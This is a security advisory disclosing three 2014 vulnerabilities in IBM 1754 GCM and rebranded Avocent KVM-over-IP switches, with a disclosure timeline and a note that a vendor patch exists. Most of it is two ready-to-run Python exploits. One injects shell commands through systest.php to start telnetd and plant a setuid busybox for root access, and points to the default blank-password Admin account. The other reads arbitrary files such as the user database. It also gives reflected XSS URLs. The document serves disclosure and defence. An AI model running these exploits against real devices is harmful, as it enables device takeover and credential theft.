*Product description*
 The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance. Versions v1.20.0.22575 and prior are
vulnerables.
 Note that this vulnerability is also present in some DELL and probably
other vendors of this rebranded KVM. I contacted Dell but no response has
been received.

 *1. Remote code execution *
 CVEID: CVE-2014-2085
 Description: Improperly sanitized input may allow a remote authenticated
attacker to perform remote code execution on the GCM KVM switch.
 PoC of this vulnerability:

#!/usr/bin/python"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""

from StringIO import StringIO
import pycurl
import os

sessid = "1111111111"
target = "192.168.0.10"

durl = "https://" + target + "/systest.php?lpres=;%20/usr/
sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%
206755%20/tmp/su%20;"

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
        print "[*] Sending GET to " + target + " with session id " + sessid
+ "..."
        c.perform()
        c.close()
except:
        print ""
finally:
        print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password
\"root\""
os.system("telnet " + target)

*2. Arbitrary file read *
 CVEID: CVE-2014-3081
 Description: This device allows any authenticated user to read arbitrary
files. Files can be anywhere on the target.

 PoC of this vulnerability:

#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user.
alex.a.bravo@gmail.com
"""

from StringIO import StringIO
import pycurl

sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"

durl = "https://" + target + "/prodtest.php?engage=video_
bits&display=results&filename=" + file

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
        c.perform()
        c.close()
except:
        print ""

content = storage.getvalue()
print content.replace("<td>","").replace("</td>","")

*3. Cross site scripting non-persistent*
 CVEID: CVE-2014-3080
 Description: System is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input. A remote attacker could exploit
this vulnerability using a specially-crafted URL to execute script in a
victim's Web browser within the security context of the hosting Web site,
once the URL is clicked. An attacker could use this vulnerability to steal
the victim's cookie-based authentication credentials.

 Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E

*Vendor Response:*
IBM release 1.20.20.23447 firmware

*Timeline:*
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed

*External Information:*
Info about the vulnerability (spanish):
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983

-- 
--
Alejandro Alvarez Bravo
alex.a.bravo@gmail.com